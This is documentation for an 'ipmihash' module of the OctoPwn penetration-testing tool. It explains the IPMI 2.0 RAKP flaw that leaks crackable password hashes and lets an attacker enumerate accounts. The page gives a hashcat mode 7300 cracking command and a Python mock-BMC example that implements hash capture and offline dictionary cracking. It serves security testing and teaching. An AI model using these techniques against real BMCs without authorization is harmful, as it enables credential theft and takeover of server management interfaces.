
IPMI Hash Attack (ipmihash)

A design flaw in the IPMI 2.0 RAKP authentication exchange makes the Baseboard Management Controller (BMC) hand the client, in RAKP Message 2, an HMAC keyed with the requested user's password (HMAC-SHA1 or HMAC-MD5, depending on the authentication algorithm in the negotiated cipher suite) computed over the session IDs, random numbers and BMC GUID of the handshake. Every input except the password is visible on the wire, so the value behaves like a salted password hash. Anyone who can reach the BMC and name a valid account therefore receives crackable material without ever completing authentication, and can run offline brute force or dictionary attacks against it to recover the plaintext password. Because the BMC answers an unknown username with an error status instead of a hash, the same exchange also enumerates valid accounts.

The ipmihash attack automates this process: it tries a fixed list of common BMC usernames (admin, administrator, root, user, guest, …) against every target on 623/UDP and, for every user the BMC acknowledges, captures the RAKP hash. Captured hashes are stored in the Credentials Hub with stype = ipmi, source = IPMI; the secret value is the Hashcat mode 7300 format string (username, salt and HMAC as hex), ready for offline cracking.

Hash Extraction Process

  1. Retrieve hashes:
     • The client sends RAKP Message 1 naming a user; the BMC replies with RAKP Message 2, which carries an HMAC of the handshake data keyed with that user's password (SHA1- or MD5-based, depending on the negotiated cipher suite).
     • The hash is obtained without successful authentication: the client never sends a password, and an unknown username is answered with an error status rather than a hash.

  2. Crack passwords:
     • Hashcat mode 7300 (IPMI2 RAKP HMAC-SHA1). The stored string starts with the username, so --username tells hashcat to strip that prefix before hashing:

    hashcat --username -m 7300 ipmi.hashes wordlist.txt
    
     • Cracking is entirely offline, so BMC lockout or rate limiting does not slow it down; only password strength does. Mode 7300 covers the HMAC-SHA1 variant of the exchange.
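To make both steps concrete, the following is an added example and not OctoPwn's own code: a mock BMC implementing the RAKP Message 1/2 exchange, the attacker side turning the reply into a Hashcat 7300 line, and the offline dictionary check that line is subjected to. The names mock_bmc_rakp2, dump_hash, crack_7300 and enumerate_users, the user database and the GUID are constructed for this illustration; the field order of the HMAC input and the salt:hash layout follow the IPMI 2.0 RAKP definition and hashcat's mode 7300 format.

```python
import hashlib
import hmac
import secrets

# RMCP+ status codes carried in RAKP Message 2. 0x0D ("unauthorized name") is
# what a BMC returns for a username it does not know, which is how the
# scanner tells valid accounts from invalid ones.
RAKP_STATUS_OK = 0x00
RAKP_STATUS_UNAUTHORIZED_NAME = 0x0D

# Constructed mock BMC state (not a real device): user database and GUID.
MOCK_BMC_USERS = {"admin": b"Passw0rd!", "root": b"calvin"}
MOCK_BMC_GUID = bytes.fromhex("537300263a2200000000000000000000")


def rakp_salt(sid_console, sid_bmc, rand_console, rand_bmc, guid_bmc, role, username):
    """Bytes the RAKP Message 2 authentication code is computed over:
    console session ID || BMC session ID || console random || BMC random ||
    BMC GUID || requested role || username length || username.
    Every field is visible on the wire, so the attacker can rebuild it;
    Hashcat mode 7300 calls this concatenation the salt."""
    return (sid_console + sid_bmc + rand_console + rand_bmc + guid_bmc
            + bytes([role, len(username)]) + username)


def mock_bmc_rakp2(rakp1):
    """Mock BMC handling RAKP Message 1. It keys an HMAC-SHA1 with the
    named user's stored password and hands the result to the client,
    although the client has not authenticated in any way yet."""
    username = rakp1["username"]
    password = MOCK_BMC_USERS.get(username.decode("ascii", "replace"))
    if password is None:
        return {"status": RAKP_STATUS_UNAUTHORIZED_NAME}
    rand_bmc = secrets.token_bytes(16)
    salt = rakp_salt(rakp1["sid_console"], rakp1["sid_bmc"], rakp1["rand_console"],
                     rand_bmc, MOCK_BMC_GUID, rakp1["role"], username)
    return {"status": RAKP_STATUS_OK, "rand_bmc": rand_bmc,
            "guid_bmc": MOCK_BMC_GUID,
            "auth_code": hmac.new(password, salt, hashlib.sha1).digest()}


def dump_hash(username, bmc=mock_bmc_rakp2, role=0x14):
    """Attacker side of the exchange for one username. Returns the
    Hashcat 7300 line 'user:salt_hex:hmac_hex' (the user: prefix is why the
    cracking command uses --username), or None if the BMC rejects the name."""
    rakp1 = {
        "sid_console": secrets.token_bytes(4),   # chosen by the client
        "sid_bmc": secrets.token_bytes(4),       # assigned by the BMC in the Open Session response
        "rand_console": secrets.token_bytes(16),
        "role": role,                            # 0x14: ADMINISTRATOR with name-only lookup
        "username": username.encode("ascii"),
    }
    rakp2 = bmc(rakp1)
    if rakp2["status"] != RAKP_STATUS_OK:
        return None
    salt = rakp_salt(rakp1["sid_console"], rakp1["sid_bmc"], rakp1["rand_console"],
                     rakp2["rand_bmc"], rakp2["guid_bmc"], role, rakp1["username"])
    return f"{username}:{salt.hex()}:{rakp2['auth_code'].hex()}"


def crack_7300(line, wordlist):
    """Offline dictionary attack on one 7300 line: the same computation the
    BMC performed, with each candidate password as the HMAC key."""
    _user, salt_hex, code_hex = line.split(":")
    salt, code = bytes.fromhex(salt_hex), bytes.fromhex(code_hex)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), salt, hashlib.sha1).digest()
        if hmac.compare_digest(guess, code):
            return candidate
    return None


def enumerate_users(candidates, bmc=mock_bmc_rakp2):
    """What ipmihash does per target: try each common username and keep
    the hash lines for the accounts the BMC acknowledges."""
    return {u: h for u in candidates if (h := dump_hash(u, bmc)) is not None}


if __name__ == "__main__":
    found = enumerate_users(["admin", "administrator", "root", "user", "guest"])
    for user, line in found.items():
        print(line)
        print("  cracked:", crack_7300(line, ["123456", "calvin", "Passw0rd!"]))
```

The point the code makes is that crack_7300 needs nothing the BMC did not volunteer: the salt is rebuilt from the client's own RAKP1 fields plus the RAKP2 reply, and the password only ever appears as the key on the BMC side. Since HMAC zero-pads short keys, keying with the raw password gives the same result as the spec's padded user key, which is why hashcat can consume the line as-is.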

See also

  • ipmicaps scanner — pre-flight check that enumerates which IPMI ciphersuites the target advertises (and whether it accepts the unauthenticated cipher 0).
  • ipmicipherzero scanner — checks for the cipher 0 authentication-bypass condition; if positive, the BMC accepts any password for a valid username and this attack is unnecessary.

Parameters

Normal Parameters

targets

Specifies the targets for the attack.

A list of targets can be specified in the following formats:

  • ID: ID of the target server from the Targets Window.
  • IP: Single IP address (e.g., 192.168.1.1).
  • CIDR: IP range in CIDR notation (e.g., 192.168.1.0/24).
  • Hostname: Resolvable hostname.
  • File: Path to a file containing targets, one per line. The file must first be uploaded into OctoPwn and is read from OctoPwn’s /browserefs/volatile directory.
  • Control word: Use all to attack all stored targets.

Advanced Parameters

maxruntime

Specifies the maximum runtime for the attack.

proxy

Specifies the proxy ID to use for the attack.

Enter the ID of the proxy to route the attack through. Proxies must be configured in the Proxy Window.

resultsfile

Specifies a file for saving the attack results.

The file will be saved in OctoPwn’s /browserefs/volatile directory.

showerrors

Determines whether errors encountered during the attack should be displayed.

timeout

Sets the timeout (in seconds) for each target.

workercount

Specifies the number of parallel workers for the attack.

wsnetreuse

Internal parameter. Do not modify.